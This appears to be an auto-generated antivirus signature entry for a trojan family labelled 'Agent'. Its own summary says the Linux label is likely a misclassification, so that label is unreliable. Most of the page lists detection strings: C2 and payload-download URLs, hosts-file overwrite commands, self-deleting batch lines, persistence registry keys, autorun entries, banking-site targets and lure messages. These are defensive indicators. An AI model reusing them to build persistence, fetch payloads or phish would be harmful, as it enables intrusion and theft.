Concrete signature match: Trojan - Appears legitimate but performs malicious actions for Linux platform, family Agent
This is a Windows trojan agent, likely misclassified as a Linux threat, that establishes persistence through malicious services and registry modifications. It masquerades as legitimate system processes while communicating with a command-and-control server (upcfg.j7y.net) to download and execute additional malware.
Relevant strings associated with this threat:
- software\borland\delphi\rtl (PEHSTR_EXT)
- shellexecutea (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\Prog.EXE (PEHSTR_EXT)
- unpacked\ (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\ (PEHSTR_EXT)
- Software\Microsoft\Windows NT\CurrentVersion\SvcHost (PEHSTR_EXT)
- svchost.exe -k netsvcs (PEHSTR_EXT)
- Referer: http:// (PEHSTR_EXT)
- http://upcfg.j7y.net/upcfg/NewUpcfg.asp?ID=%d (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\\dcom server (REGKEY)
- system sys process.exe (PEHSTR_EXT)
- windows\Windows Medoc\ (PEHSTR_EXT)
- windows_dxgc.exe (PEHSTR_EXT)
- mvumisc.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\MSrtn\value1 (PEHSTR_EXT)
- KRSystem v1.0 (PEHSTR_EXT)
- http://upd. (PEHSTR_EXT)
- .com/upd/check (PEHSTR_EXT)
- Download UBAgent (PEHSTR_EXT)
- updbho.dll (PEHSTR_EXT)
- IEHpr.DLL (PEHSTR)
- DllRegisterServer (PEHSTR)
- 1.txt (PEHSTR)
- 1.bmp (PEHSTR)
- 1.exe (PEHSTR)
- 1.dll (PEHSTR)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR)
- 116.122.135.13/access_count.html (PEHSTR)
- deleteself.bat (PEHSTR)
- Execute_Updater (PEHSTR)
- -Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR)
- c:\windows\systemp.exe (PEHSTR_EXT)
- c:\wabok.log (PEHSTR_EXT)
- c:\nois.log (PEHSTR_EXT)
- computador= (PEHSTR_EXT)
- \donm.dll (PEHSTR_EXT)
- Winsta0\Default (PEHSTR_EXT)
- rundll32.exe (PEHSTR_EXT)
- rundll32.exe C:\WINDOWS\SYSTEM32\donm.dll Start * (PEHSTR_EXT)
- spider.gucciservice.biz (PEHSTR_EXT)
- CLSID\{92617934 (PEHSTR_EXT)
- https://www.e-gold.com/ (PEHSTR_EXT)
- acct/acct.asp (PEHSTR_EXT)
- acct/accountinfo.asp (PEHSTR_EXT)
- acct/balance.asp (PEHSTR_EXT)
- User-Agent: (PEHSTR_EXT)
- -Software\Microsoft\Internet Explorer\Security (PEHSTR)
- /bn/comgate.xhtml? (PEHSTR)
- Host: checkip.dyndns.org (PEHSTR)
- HUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET (PEHSTR)
- POST %s HTTP/1.1 (PEHSTR)
- data: i/o error (PEHSTR)
- rcpt to: i/o error (PEHSTR)
- mail from: i/o error (PEHSTR)
- OK. Got %d ips (PEHSTR)
- out-sessions.log (PEHSTR)
- mail.ru (PEHSTR)
- MG/m=%d, T=%d, G=%d, B=%d (bl=%d, nouser=%d, nomx=%d, ioerr=%d, err=%d), th=%d (PEHSTR)
- postmaster@usa.net (PEHSTR)
- \Simply Super Software\Trojan Remover\ (PEHSTR_EXT)
- smtp-client-rls.dll (PEHSTR_EXT)
- WS2_32.dll (PEHSTR_EXT)
- DEL "C:\myapp.exe (PEHSTR)
- Ping 0.0.0.0 (PEHSTR)
- #IF EXIST "C:\myapp.exe" GOTO Repeat (PEHSTR)
- foo.com (PEHSTR)
- %sNL%i%i%i.bat (PEHSTR)
- AgentIPPort (PEHSTR)
- 3SOFTWARE\Intel\LANDesk\VirusProtect6\CurrentVersion (PEHSTR)
- %s\wins\svchost.exe (PEHSTR)
- \qservice.exe (PEHSTR)
- \agnt_fps.exe (PEHSTR)
- \agnt_fps.dat (PEHSTR)
- \HookMpi.dll (PEHSTR)
- \agnt_mps.exe (PEHSTR)
- \agnt_mps.dat (PEHSTR)
- \agnt_pnc.exe (PEHSTR)
- \_pnc.dat (PEHSTR)
- \agnt_msn.exe (PEHSTR)
- \agnt_msn.dat (PEHSTR)
- \services.dll (PEHSTR)
- \drivers\HideMe.sys (PEHSTR)
- \msdirectx.sys (PEHSTR)
- \kurlmon.dll (PEHSTR)
- \msehk.dll (PEHSTR)
- \bszip.dll (PEHSTR)
- \wins32.zip (PEHSTR)
- \FileZilla.xml (PEHSTR)
- mcvsescn.exe (PEHSTR)
- \wins32\ (PEHSTR)
- \close.log (PEHSTR_EXT)
- \dial.log (PEHSTR_EXT)
- \Shell\Open (PEHSTR_EXT)
- \Shell\Open\Command (PEHSTR_EXT)
- \WinInit.Ini (PEHSTR_EXT)
- Control Panel\International (PEHSTR_EXT)
- trackkey.exe (PEHSTR_EXT)
- trackurl.exe (PEHSTR_EXT)
- kill.exe (PEHSTR_EXT)
- dial.exe (PEHSTR_EXT)
- dial:// (PEHSTR_EXT)
- direct.exe (PEHSTR_EXT)
- http://www.adserver.com (PEHSTR_EXT)
- http://www.alexa.com (PEHSTR_EXT)
- http://www.alibaba.com (PEHSTR_EXT)
- http://www.amazon.com (PEHSTR_EXT)
- http://www.apple.com (PEHSTR_EXT)
- http://www.cnn.com (PEHSTR_EXT)
- http://www.ebay.com (PEHSTR_EXT)
- http://www.fastclick.com (PEHSTR_EXT)
- #bbmeeomnvpop.dll (PEHSTR)
- fastmail. (PEHSTR)
- graffiti. (PEHSTR)
- .com/current/ (PEHSTR)
- Explorer\Shell Folders (PEHSTR)
- application/pdf (PEHSTR)
- !Internet Account Manager\Accounts (PEHSTR)
- passwords.doc (PEHSTR)
- User-Agent: Microsoft Outlook (PEHSTR)
- Date: %s, %.2d %s %.4d (PEHSTR)
- explorer.exe (PEHSTR_EXT)
- svchost.exe (PEHSTR_EXT)
- haha.exe (PEHSTR_EXT)
- msnworm.exe (PEHSTR_EXT)
- Goto SuperrSoft.com.URL (PEHSTR_EXT)
- qq.exe (PEHSTR_EXT)
- rundll32.exe (PEHSTR_EXT)
- taskmgr.exe (PEHSTR_EXT)
- elementclient.exe (PEHSTR_EXT)
- drivers\etc\hosts (PEHSTR_EXT)
- serverlist.ini (PEHSTR_EXT)
- User-Agent: Mozilla (PEHSTR_EXT)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR_EXT)
- WinExec (PEHSTR_EXT)
- %s%s.bat (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- Software\Microsoft\WAB\WAB4\Wab File Name (PEHSTR_EXT)
- %s.%s@%s (PEHSTR_EXT)
- %s%s.zip (PEHSTR_EXT)
- %s.doc.exe (PEHSTR_EXT)
- %s.txt.exe (PEHSTR_EXT)
- Software\Microsoft\Internet Account Manager\Accounts (PEHSTR_EXT)
- $_2341234.TMP (PEHSTR)
- _exp.exe (PEHSTR)
- cgrb.exe (PEHSTR)
- _i%s%05d.exe (PEHSTR)
- i%s%05d.dll (PEHSTR)
- i%s%05d.exe (PEHSTR)
- @if (top.location != self.location) top.location = self.location; (PEHSTR)
- !document.login.PIN.value="*****"; (PEHSTR)
- .formObj.elements.getAttribute(temp1).value=''; (PEHSTR)
- \hosts.sam (PEHSTR)
- \system32\drivers\etc\hosts (PEHSTR)
- User-Agent: MSID [ (PEHSTR)
- -SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR)
- \..\temp (PEHSTR)
- 5SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (PEHSTR)
- ibm%05d.dll (PEHSTR)
- ibm%05d.exe (PEHSTR)
- /cib/login.jsp?*fiorg= (PEHSTR)
- cib.ibanking-services.com (PEHSTR)
- *vr-*ebanking.de (PEHSTR)
- rundll32.exe C:\WINDOWS\SYSTEM32\ntoskrnl.dll , DllMaind (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\drivers\inetx (PEHSTR_EXT)
- winsta0\defaultd (PEHSTR_EXT)
- OFTWARE\Mic (PEHSTR_EXT)
- /o5sofWindowsOV (PEHSTR_EXT)
- /ion\Run\dHv (PEHSTR_EXT)
- system.exe (PEHSTR_EXT)
- |x*.*#svcho! (PEHSTR_EXT)
- krnl.dll (PEHSTR_EXT)
- Software\Borland\Delphi\Locales (PEHSTR_EXT)
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword (PEHSTR_EXT)
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) (PEHSTR_EXT)
- Content-Type: application/ochd (PEHSTR_EXT)
- Ct2Dll.dll (PEHSTR_EXT)
- http://df.hangame.com/?GO=home (PEHSTR_EXT)
- KeyHook.dll (PEHSTR_EXT)
- c:\1.txt (PEHSTR_EXT)
- http://df.hangame.com (PEHSTR_EXT)
- DNF.exe (PEHSTR_EXT)
- http://www.yamsgame.com/itembay/sendmail.asp?tomail=wdo (PEHSTR_EXT)
- file one content. Contant-Type can be application/octet-stream or ifyou want you can ask your OS fot the exact type (PEHSTR_EXT)
- http://218.36.124.41/demogs/demo.asp (PEHSTR_EXT)
- URLMON.dll (PEHSTR_EXT)
- ipconfig /renew (PEHSTR_EXT)
- %system%\debitos.scr (PEHSTR)
- (%system%\my_backdoor (no x win 2000).exe (PEHSTR)
- %system%\eexplorer.exe (PEHSTR)
- %system%\keyhook.dll (PEHSTR)
- %windir%\help\kill.exe (PEHSTR)
- #%desktop%\Backdoor.IRC.Cloner.v.exe (PEHSTR)
- %desktop%\Backdoor.IRC.Bnc.c.exe (PEHSTR)
- %desktop%\Backdoor.IRC.Belio.exe (PEHSTR)
- #%desktop%\Backdoor.IRC.Banned.b.exe (PEHSTR)
- "%desktop%\Backdoor.IRC.Ataka.a.exe (PEHSTR)
- %system%\svcxnv32.exe (PEHSTR)
- %windir%\winsocks5.exe (PEHSTR)
- %system%\winsdata.exe (PEHSTR)
- %system%\ravmond.exe (PEHSTR)
- %system%\WINWGPX.EXE (PEHSTR)
- %desktop%\Backdoor.IRC.Acnuz.exe (PEHSTR)
- %desktop%\Backdoor.ASP.Ace.b.exe (PEHSTR)
- %desktop%\Backdoor.ASP.Ace.a.exe (PEHSTR)
- /%desktop%\msn\Backdoor.Win32.MSNCorrupt.exe.exe (PEHSTR)
- &%desktop%\Backdoor.Win32.Bifrose.a.exe (PEHSTR)
- Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR_EXT)
- Software\Microsoft\Internet Explorer\Main (PEHSTR_EXT)
- \Microsoft\Internet Explorer\Quick Launch (PEHSTR_EXT)
- HTTPTEST (PEHSTR_EXT)
- You and Me !!! .... looook :p (PEHSTR)
- Sen ve Ben !!! .... BAK :p (PEHSTR)
- /benim bu ciplak fotoda :o ama baskasina yollama (PEHSTR)
- *Regarde comment Paris Hilton parait efondr (PEHSTR)
- Toi et moi !!! .... regarde :p (PEHSTR)
- new.txtd (PEHSTR)
- .baby (PEHSTR)
- ASoftware\Microsoft\Windows\CurrentVersion\Explorer\Data\Address46 (PEHSTR)
- >Software\Microsoft\Windows\CurrentVersion\Explorer\Data\Auth46 (PEHSTR)
- &Microsoft\Internet Explorer\prndrv.dll (PEHSTR)
- Software\Microsoft\Filter (PEHSTR)
- Script execution failed (PEHSTR)
- .SubmitFormImage (PEHSTR)
- .ClickHyperlink (PEHSTR)
- 72.232.136.59 (PEHSTR)
- .SubmitForm (PEHSTR)
- proxy2.dll (PEHSTR)
- GET %s HTTP/1.1 (PEHSTR_EXT)
- Accept: */* (PEHSTR_EXT)
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; %s) (PEHSTR_EXT)
- Failed to connect. (PEHSTR_EXT)
- \dllcache\verclsid.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop (PEHSTR_EXT)
- fixfile.exe (PEHSTR)
- Autorun.inf (PEHSTR)
- :\Autorun.inf (PEHSTR)
- open=Recyc1ed\Mcshie1d.exe (PEHSTR)
- )shell\open\Command="Recyc1ed\Mcshie1d.exe (PEHSTR)
- /shell\explore\Command="Recyc1ed\Mcshie1d.exe -e (PEHSTR)
- Accept: */* (PEHSTR)
- Agent%ld (PEHSTR)
- .rsrc (PEHSTR)
- .data (PEHSTR)
- .exe (PEHSTR)
- %s%s%d.exe (PEHSTR)
- netdat.tmp (PEHSTR)
- %s.exe (PEHSTR)
- C:\Recycled\ (PEHSTR)
- SysWin64.Jmp (PEHSTR_EXT)
- SysWin64.Lst (PEHSTR_EXT)
- CLSID\{40117B96-998D-4D80-8F89-5E9DBD9F3460} (PEHSTR_EXT)
- (&O)\command=AutoRun.exe (PEHSTR_EXT)
- shellexecute=AutoRun.exe (PEHSTR_EXT)
- E:\AutoRun.exe (PEHSTR_EXT)
- E:\AutoRun.Inf (PEHSTR_EXT)
- WinSys64.Tao (PEHSTR_EXT)
- Software\Tencent\Gm (PEHSTR_EXT)
- http://www.126.cn/ (PEHSTR_EXT)
- ExplOrer.exe (PEHSTR_EXT)
- Setup.zip.exe (PEHSTR)
- p2pex.zip.exe (PEHSTR)
- www.regione.calabria.it (PEHSTR)
- You Are Empty.zip.exe (PEHSTR)
- Windows Xp on PsP.zip.exe (PEHSTR)
- Half Life 2 Episode One.zip.exe (PEHSTR)
- DOOM 3 Full 3 CD Bonus.zip.exe (PEHSTR)
- -Windows Vista Ultimate SP3 2007 Crack.zip.exe (PEHSTR)
- /cntr/bin/ (PEHSTR_EXT)
- /ab.php|http:// (PEHSTR_EXT)
- /cl/main.php (PEHSTR_EXT)
- /rule.php|http:// (PEHSTR_EXT)
- ab.php (PEHSTR_EXT)
- taskdir~.exe (PEHSTR_EXT)
- POST %s HTTP/1.0 (PEHSTR_EXT)
- User-Agent: Mozilla/3.0b5a (PEHSTR_EXT)
- @mail.ru (PEHSTR_EXT)
- update.bat (PEHSTR_EXT)
- log.txt (PEHSTR_EXT)
- >.textD> (PEHSTR_EXT)
- >.dat (PEHSTR_EXT)
- dos.haowan1.com (PEHSTR)
- GET /chr/907/nt.exe HTTP/1.1 (PEHSTR_EXT)
- Host: www6.badesugerwakirpos.com (PEHSTR_EXT)
- http://www6.badesugerwakirpos.com/chr/907/nt.exe (PEHSTR_EXT)
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) (PEHSTR_EXT)
- %WINDIR%\tpup.exe (PEHSTR_EXT)
- C:\WINDOWS\tpup.exe (PEHSTR_EXT)
- Agent%ld (PEHSTR_EXT)
- C:\WINDOWS\csrss.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 (PEHSTR_EXT)
- Windows Atualizado Com Sucessod (PEHSTR_EXT)
- C:\windows\windowsupdate7.exed (PEHSTR_EXT)
- http://experimental.sitesled.com/wind.jpg (PEHSTR_EXT)
- System\CurrentControlSet\Control\Keyboard Layouts\%.8x (PEHSTR_EXT)
- uxtheme.dll (PEHSTR_EXT)
- ShellExecuteA (PEHSTR_EXT)
- &http://superfast.com.sapo.pt/fotos.com (PEHSTR)
- c:\895004.exe (PEHSTR)
- c:\605645.txt (PEHSTR)
- ShellExecuteA (PEHSTR)
- \rudll32.exe (PEHSTR_EXT)
- \notpad.exe (PEHSTR_EXT)
- \ashMails.exe (PEHSTR_EXT)
- \ashServs.exe (PEHSTR_EXT)
- \x000.exe (PEHSTR_EXT)
- \agentesfirewall.exe (PEHSTR_EXT)
- \plugin.exe (PEHSTR_EXT)
- \n.ini (PEHSTR_EXT)
- \wbem\csrss.exe (PEHSTR_EXT)
- internet settings\zones\3 (PEHSTR_EXT)
- DLLSTARTER.dll (PEHSTR_EXT)
- %08X.dll (PEHSTR_EXT)
- BASESRV.BaseSrvNlsUpdateRegistryCache (PEHSTR_EXT)
- BASESRV.BaseSetProcessCreateNotify (PEHSTR_EXT)
- BASESRV.ServerDllInitialization (PEHSTR_EXT)
- BASESRV.BaseSrvNlsLogon (PEHSTR_EXT)
- BASESRV.DLL (PEHSTR_EXT)
- nusrmgr.exe (PEHSTR_EXT)
- http://liveupdatesnet.com/ (PEHSTR_EXT)
- MSVBVM60.DLL (PEHSTR_EXT)
- HTTP/1.1 (PEHSTR_EXT)
- /m.php?aid= (PEHSTR_EXT)
- vmwareservice.exe (PEHSTR_EXT)
- loader.exe (PEHSTR_EXT)
- del "c:\myapp.exe" (PEHSTR_EXT)
- ping 127.0.0.1 >nul (PEHSTR_EXT)
- if exist "c:\myapp.exe (PEHSTR_EXT)
- c:\myDelm.bat (PEHSTR_EXT)
- 360tray.exe (PEHSTR_EXT)
- KRegEx.exe (PEHSTR_EXT)
- KVXP.kxp (PEHSTR_EXT)
- 212.179.35.31 (PEHSTR_EXT)
- Software\SGPlay (PEHSTR_EXT)
- :\program files\internet explorer\iexplore.exe (PEHSTR_EXT)
- Ok, lets start baby! Lets see if you can strip me :). (PEHSTR_EXT)
- I'm 18 years old and you have come to the (PEHSTR_EXT)
- 1 of my things. :) Want to start strip me? Then what are you (PEHSTR_EXT)
- waiting for? Click the start play. (PEHSTR_EXT)
- \SkypeClient.exe (PEHSTR)
- \wininit.ini (PEHSTR)
- \my_70008.exe (PEHSTR)
- \s02.exe (PEHSTR)
- \dodolook349.exe (PEHSTR)
- \ad_2374.exe (PEHSTR)
- \setup1166.exe (PEHSTR)
- \shuigenet_cb.exe (PEHSTR)
- ,http://beruijindegunhadesun.com/ktmcheck.exe (PEHSTR)
- GET /ktmcheck.exe HTTP/1.1 (PEHSTR)
- >User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) (PEHSTR)
- Host: beruijindegunhadesun.com (PEHSTR)
- onlysex. (PEHSTR)
- \msvsres.dll (PEHSTR)
- www.msnprotection.com (PEHSTR)
- www.msnhelper.net (PEHSTR)
- /flushdns (PEHSTR)
- /registerdns (PEHSTR)
- !www.pcspyremover.com/help/ref.php (PEHSTR)
- "www.nomorepcspies.com/help/ref.php (PEHSTR)
- -Software\Microsoft\Internet Explorer\Settings (PEHSTR)
- ISOFTWARE\Microsoft\Windows\CurrentVersion\explorer\browser helper objects (PEHSTR)
- -software\microsoft\windows\currentversion\run (PEHSTR)
- happy-movies.com (PEHSTR)
- hardmovies.net (PEHSTR)
- birdmovies.com (PEHSTR)
- (%SystemRoot%\system32\drivers\pcihdd.sys (PEHSTR)
- "%SystemRoot%\System32\Userinit.exe (PEHSTR)
- microbillsys.com (PEHSTR)
- mibrsys.exe (PEHSTR)
- URL Changer.DLL (PEHSTR_EXT)
- DllCanUnloadNow (PEHSTR_EXT)
- DllGetClassObject (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- DllUnregisterServer (PEHSTR_EXT)
- http://soft.trustincash.com/url/config.xml (PEHSTR_EXT)
- WScript (PEHSTR_EXT)
- sdf!`ee!IJDX^MNB@M^L@BIHOD]RNGUV@SD]LHBSNRNGU]VHOENVR]BTSSDOUWDSRHNO]STO!.W!RWBINRUR/DYD!.U!SDF^R[!.E!B;]VHOENVR]RXRUDL23] (PEHSTR_EXT)
- DYD!.G (PEHSTR_EXT)
- 203.121.69.232 (PEHSTR)
- *Mozilla/5.0 Gecko/20050212 Firefox/1.5.0.2d (PEHSTR)
- aol92.exed (PEHSTR)
- KB0626395.logd (PEHSTR)
- cookies.zipd (PEHSTR)
- flash.zip (PEHSTR)
- webcashmgmt.com (PEHSTR)
- nationalcity.com/corporate (PEHSTR)
- www.enternetbank.com/ewb/ (PEHSTR)
- treasury.pncbank (PEHSTR)
- business.ml.com (PEHSTR)
- User Agent\Post Platform (PEHSTR_EXT)
- htmlfile\shell\open\ddeexec\application (PEHSTR_EXT)
- rundll32 %s Start (PEHSTR_EXT)
- %s\drivers\%s.sys (PEHSTR_EXT)
- live.dll (PEHSTR_EXT)
- olwnrf96.dll (PEHSTR_EXT)
- \%s.sys (PEHSTR_EXT)
- %s\\drivers (PEHSTR_EXT)
- %s\\%s.dll (PEHSTR_EXT)
- c:\windows\system32\\drivers\\ (PEHSTR_EXT)
- catclogd.dll (PEHSTR_EXT)
- state.dll (PEHSTR_EXT)
- live.sys (PEHSTR_EXT)
- cchost.exe (PEHSTR_EXT)
- /hctawetomer/ten. (PEHSTR_EXT)
- //:ptth (PEHSTR_EXT)
- \system32\drivers\svchost.exe (PEHSTR)
- %SYSTEMROOT%\system32\svchost.dll (PEHSTR)
- Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR)
- index.dat (PEHSTR)
- www.av-king.net (PEHSTR)
- han-key.com (PEHSTR)
- GenProtect.dll (PEHSTR)
- GenProtect.exE (PEHSTR)
- e:\work\malwar\hard\EngineDll\release\EngineDll.pdbd (PEHSTR_EXT)
- COMRPCMutex0d (PEHSTR_EXT)
- http://81.95.144.242/tes/cout.php (PEHSTR_EXT)
- /rpc/cl.php (PEHSTR_EXT)
- geWeb2 Agent 1.0 (PEHSTR_EXT)
- \\.\kcp (PEHSTR_EXT)
- C:\Windows\iexplore.exe (PEHSTR_EXT)
- EngineDll.dll (PEHSTR_EXT)
- mxs.mail.ru (PEHSTR_EXT)
- gmail-smtp-in.l.google.com (PEHSTR_EXT)
- gsmtp183.google.com (PEHSTR_EXT)
- in1.smtp.messagingengine.com (PEHSTR_EXT)
- mail7.digitalwaves.co.nz (PEHSTR_EXT)
- Free DLL Done! (PEHSTR_EXT)
- ServiceDll (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\BITS\Parameters (PEHSTR_EXT)
- Start DLL Service: (PEHSTR_EXT)
- "%s\Internet Explorer\iexplorer.exe (PEHSTR)
- !%s\Internet Explorer\iexplore.exe (PEHSTR)
- %POST /cgi-bin/cgi_proxy?cl=1 HTTP/1.1 (PEHSTR)
- :User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) (PEHSTR)
- \temp_%d.bat (PEHSTR)
- SOFTWARE\Numega (PEHSTR)
- login.icq.com (PEHSTR_EXT)
- %sauto.php?v=%d (PEHSTR_EXT)
- AmirCivil Worm.pdbd (PEHSTR)
- \taskmrg.exe (PEHSTR)
- \Driver32.exe (PEHSTR)
- \Sex Story.txt.exe (PEHSTR)
- \SexStory.txt (PEHSTR)
- xxx.3gp (PEHSTR)
- crims.jpg (PEHSTR)
- sex webshot2008.scr (PEHSTR)
- xnxx screensaver2008.scr (PEHSTR)
- sex web shot.scr (PEHSTR)
- xnxx screen saver.scr (PEHSTR)
- exploit for vista.txt (PEHSTR)
- sex movie list.dat (PEHSTR)
- www.symantec.com (PEHSTR)
- www.kaspersky.com (PEHSTR)
- http://new.749571.com/xin.txt (PEHSTR_EXT)
- c:\Program Files\ctfmone.exe (PEHSTR_EXT)
- c:\Program Files\ctfmona.exe (PEHSTR_EXT)
- %smdmscan%d.log (PEHSTR_EXT)
- \%s\pipe\BROWSER (PEHSTR_EXT)
- Sending payload2...finish (PEHSTR_EXT)
- Sending payload1...finish (PEHSTR_EXT)
- 9RING0EXE (PEHSTR)
- tempdir.exe (PEHSTR)
- %s\drivers\%s (PEHSTR)
- KeServiceDescriptorTable (PEHSTR)
- ntdll.dll (PEHSTR)
- cmd (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform (PEHSTR_EXT)
- %s\body.txt (PEHSTR_EXT)
- %s\subject.txt (PEHSTR_EXT)
- \system32\catclogd.dll (PEHSTR_EXT)
- rundll32.exe %s,Start (PEHSTR_EXT)
- winsys.reg (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer (PEHSTR_EXT)
- avp.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\ (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- Content-Type: application/octet-stream; name="%s" (PEHSTR_EXT)
- System Recovery Agent (PEHSTR_EXT)
- Software\Kazaa\LocalContent (PEHSTR_EXT)
- GET ^%$%^&**(*((&&*^&&%%^&*(*&$%$^%$#^*^%$##$.htmGET ^*%%RFTGYHJIRTG*(&^%DFG(JKJHJ%^&*()*&*^&%.aspGET *(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html (PEHSTR_EXT)
- Referer: http://www.google.com (PEHSTR_EXT)
- Referer: http://www.baidu.com (PEHSTR_EXT)
- \systom32\svchost.exe (PEHSTR_EXT)
- c:\pagefile.pif (PEHSTR_EXT)
- \cmd.exe /c (PEHSTR_EXT)
- \spoolsr.exe (PEHSTR)
- \SYSTEM32\spoolsr.exe (PEHSTR)
- shell32.dll (PEHSTR)
- %s\%s%d.exe (PEHSTR_EXT)
- User-Agent: Mozilla/4.0 (compatible; (PEHSTR_EXT)
- http (PEHSTR_EXT)
- ShellExecuteHooks (PEHSTR_EXT)
- regedit /s (PEHSTR_EXT)
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks] (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\tmpFile (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\srservice (PEHSTR_EXT)
- Software\Adobe\STR (PEHSTR_EXT)
- C:\kernelcheck.exe (PEHSTR)
- shell\Auto\command=autorun.exe (PEHSTR)
- magnet\shell\open\command (PEHSTR)
- C:\TEMP\\sysfnx.exe (PEHSTR)
- Grundll32 yinhu.dll Install (PEHSTR)
- \yinhu.bat (PEHSTR)
- bat.bat (PEHSTR)
- C:\WINDOWS\SYSTEM32\yinhu.bat (PEHSTR)
- RegSetValueEx(ServiceDll) (PEHSTR)
- SvcHost.DLL.log (PEHSTR)
- 'Global\%s-key-metux (PEHSTR)
- Global\%s-key-event (PEHSTR)
- POST http://%s:%d/%s HTTP/1.1 (PEHSTR)
- (SOFTWARE\Classes\HTTP\shell\open\command (PEHSTR)
- SYSTEM\ControlSet001\Services\%s (PEHSTR)
- "PR.EXE 192.168.0.1 1-65535 -d:1 -e (PEHSTR)
- zmsnmsgr.exe (PEHSTR)
- \MSNMessenger\ (PEHSTR)
- SOFTWARE\Classes\HTTP\shell\open\command (PEHSTR)
- Windows\CurrentVersion\Run (PEHSTR)
- \System\System32.exe (PEHSTR_EXT)
- \System\update.exe (PEHSTR_EXT)
- \eMule\Incoming\ (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- 1.3.6.1.5.5.7.3.2 (PEHSTR)
- %s:%d/aspxabcdefg.asp? (PEHSTR)
- User-Agent: webclient (PEHSTR)
- \user.ini (PEHSTR)
- tigerwood.vicp.net (PEHSTR)
- otna.vicp.net (PEHSTR)
- &Agent=%s&version=%s&infoversion=%s (PEHSTR_EXT)
- update\updatefile.lst (PEHSTR_EXT)
- \sysupdate.ini (PEHSTR_EXT)
- \sysoption.ini (PEHSTR_EXT)
- up.dat (PEHSTR_EXT)
- waitdown.lst (PEHSTR_EXT)
- X-Tank Agent (PEHSTR_EXT)
- ctfmon.exe (PEHSTR_EXT)
- \dll.dll (PEHSTR_EXT)
- \systcm.sys (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- try-anything-else.com/ (PEHSTR_EXT)
- localhost-2.com/ (PEHSTR_EXT)
- rx-from-warehouse3.com/ (PEHSTR_EXT)
- /c del C:\myapp.exe > nul (PEHSTR)
- ShellExecuteExA (PEHSTR)
- @msn.com.br (PEHSTR)
- msnmsgr.exe (PEHSTR)
- avgcc.exe (PEHSTR)
- NAVW32.EXE (PEHSTR)
- NPFMNTOR.EXE (PEHSTR)
- SNDSrvc.exe (PEHSTR)
- CCAPP.EXE (PEHSTR)
- /"%s" -hide (PEHSTR)
- CMD: get... (PEHSTR)
- Wow.exe (PEHSTR)
- DSoftware\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks (PEHSTR)
- ISOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects (PEHSTR)
- SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp (PEHSTR_EXT)
- SOFTWARE\Policies\Microsoft\Windows\Installer\EnableAdminTSRemote (PEHSTR_EXT)
- batfile.bat (PEHSTR)
- batchfile.bat (PEHSTR)
- )del c:\WINDOWS\system32\drivers\etc\hosts (PEHSTR)
- 0copy hosts c:\WINDOWS\system32\drivers\etc\hosts (PEHSTR)
- %>>%windir%\System32\drivers\etc\hosts (PEHSTR)
- echo 75.127.83. (PEHSTR)
- echo 75.127.85. (PEHSTR)
- myfot0s.ifrance.com (PEHSTR_EXT)
- VolControl.VolumeControl (PEHSTR_EXT)
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) (PEHSTR_EXT)
- \svchost.exe -k (PEHSTR_EXT)
- SYSTEM\ControlSet001\Services\%s (PEHSTR_EXT)
- POST http://%s:%d/%s HTTP/1.1 (PEHSTR_EXT)
- Global\%s-key-Metux (PEHSTR_EXT)
- Remote_2010.08.03 (PEHSTR_EXT)
- %s%d.dat (PEHSTR_EXT)
- \xxxxxxx.dbg (PEHSTR_EXT)
- delself.bat (PEHSTR)
- d32dx9.sys (PEHSTR)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (PEHSTR)
- mb.asp?a=1&c= (PEHSTR)
- xymain.bin (PEHSTR)
- HttpSendRequestA (PEHSTR)
- MailAgent (PEHSTR_EXT)
- help.dll (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Setup (PEHSTR_EXT)
